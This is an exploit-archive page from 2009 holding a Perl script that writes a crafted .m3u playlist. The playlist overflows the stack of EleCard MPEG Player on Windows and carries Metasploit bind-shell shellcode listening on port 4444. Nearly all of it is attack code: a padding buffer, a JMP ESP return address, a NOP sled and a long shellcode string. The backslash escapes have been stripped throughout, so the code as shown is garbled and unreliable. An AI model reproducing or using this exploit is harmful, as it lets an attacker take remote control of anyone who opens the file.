EleCard MPEG PLAYER (.m3u file) Local Stack Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : EleCard MPEG PLAYER (.m3u file) Local Stack Overflow Exploit
# Published : 2009-01-25
# Author : AlpHaNiX
# Previous Title : Zinf Audio Player 2.2.1 (PLS File) Local Buffer Overflow Exploit (univ)
# Next Title : PostgreSQL 8.2/8.3/8.4 UDF for Command Execution

#!/usr/bin/perl
# By ALpHaNiX
# NullArea.Net
# THanks
#EAX 00000000
#ECX 41414141
#EDX 775A104D
#EBX 00000000
#ESP 0012C280
#EBP 0012C2A0
#ESI 00000000
#EDI 00000000
#EIP 41414141

system("color 5");

if (@ARGV != 1) { &help; exit(); }

sub help(){
       print "[X] Usage : ./exploit.pl filename n";
}

{ $file = $ARGV[0]; }
print "n [X]*************************************************n";
print " [X]EleCard MPEG PLAYER Local Stack Overflow Exploit *n";
print " [X]        Coded By AlpHaNiX                        *n";
print " [X]         From Null Area [NullArea.Net]           *n";
print " [X]**************************************************nn";

print "[+] Exploiting.....n" ;

my $buff="http://"."x41" x 969 ;
my $nop ="x90" x 6000 ;
my $ret ="xB3x37x8Dx6E"  ; #  JMP ESP In DDRAW.Dll In Windows
Vista Ultimate English

# win32_bind -  EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum
http://metasploit.com
my $shellcode =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx36x4bx4e".
"x4dx54x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x56x4bx58".
"x4ex36x46x52x46x42x4bx38x45x54x4ex33x4bx48x4ex37".
"x45x50x4ax57x41x30x4fx4ex4bx38x4fx44x4ax31x4bx58".
"x4fx55x42x42x41x30x4bx4ex49x54x4bx48x46x53x4bx58".
"x41x30x50x4ex41x43x42x4cx49x59x4ex4ax46x38x42x4c".
"x46x47x47x50x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e".
"x46x4fx4bx53x46x35x46x42x4ax52x45x47x45x4ex4bx48".
"x4fx35x46x52x41x30x4bx4ex48x46x4bx58x4ex30x4bx44".
"x4bx48x4fx35x4ex51x41x50x4bx4ex43x50x4ex52x4bx48".
"x49x38x4ex46x46x42x4ex31x41x36x43x4cx41x53x4bx4d".
"x46x36x4bx58x43x34x42x43x4bx58x42x44x4ex30x4bx48".
"x42x47x4ex31x4dx4ax4bx48x42x54x4ax30x50x45x4ax56".
"x50x38x50x54x50x30x4ex4ex42x45x4fx4fx48x4dx48x46".
"x43x45x48x56x4ax46x43x53x44x33x4ax46x47x57x43x57".
"x44x33x4fx35x46x45x4fx4fx42x4dx4ax56x4bx4cx4dx4e".
"x4ex4fx4bx43x42x45x4fx4fx48x4dx4fx35x49x48x45x4e".
"x48x56x41x58x4dx4ex4ax50x44x30x45x55x4cx46x44x50".
"x4fx4fx42x4dx4ax36x49x4dx49x30x45x4fx4dx4ax47x35".
"x4fx4fx48x4dx43x45x43x55x43x45x43x45x43x45x43x54".
"x43x55x43x34x43x55x4fx4fx42x4dx48x36x4ax56x41x41".
"x4ex55x48x46x43x55x49x58x41x4ex45x49x4ax46x46x4a".
"x4cx41x42x37x47x4cx47x45x4fx4fx48x4dx4cx46x42x41".
"x41x55x45x45x4fx4fx42x4dx4ax56x46x4ax4dx4ax50x32".
"x49x4ex47x35x4fx4fx48x4dx43x35x45x45x4fx4fx42x4d".
"x4ax56x45x4ex49x54x48x58x49x44x47x35x4fx4fx48x4d".
"x42x45x46x35x46x45x45x35x4fx4fx42x4dx43x39x4ax46".
"x47x4ex49x47x48x4cx49x47x47x55x4fx4fx48x4dx45x45".
"x4fx4fx42x4dx48x46x4cx46x46x56x48x56x4ax36x43x56".
"x4dx36x49x48x45x4ex4cx46x42x55x49x35x49x52x4ex4c".
"x49x38x47x4ex4cx36x46x54x49x48x44x4ex41x33x42x4c".
"x43x4fx4cx4ax50x4fx44x54x4dx42x50x4fx44x54x4ex52".
"x43x59x4dx58x4cx37x4ax53x4bx4ax4bx4ax4bx4ax4ax36".
"x44x37x50x4fx43x4bx48x41x4fx4fx45x57x46x44x4fx4f".
"x48x4dx4bx35x47x45x44x55x41x35x41x45x41x45x4cx46".
"x41x50x41x55x41x45x45x35x41x45x4fx4fx42x4dx4ax56".
"x4dx4ax49x4dx45x30x50x4cx43x35x4fx4fx48x4dx4cx46".
"x4fx4fx4fx4fx47x53x4fx4fx42x4dx4bx58x47x55x4ex4f".
"x43x48x46x4cx46x56x4fx4fx48x4dx44x55x4fx4fx42x4d".
"x4ax56x42x4fx4cx48x46x50x4fx55x43x35x4fx4fx48x4d".
"x4fx4fx42x4dx5a";

my $exploit = $buff.$ret.$nop.$shellcode;
print "[+] Creating Evil File" ;
open(blah, ">>$file") or die "Cannot open $file";
print blah $exploit;
close(blah);
print "n[+] Please wait while creating $file";
print "n[+] $file has been created";

# www.Syue.com [2009-01-25]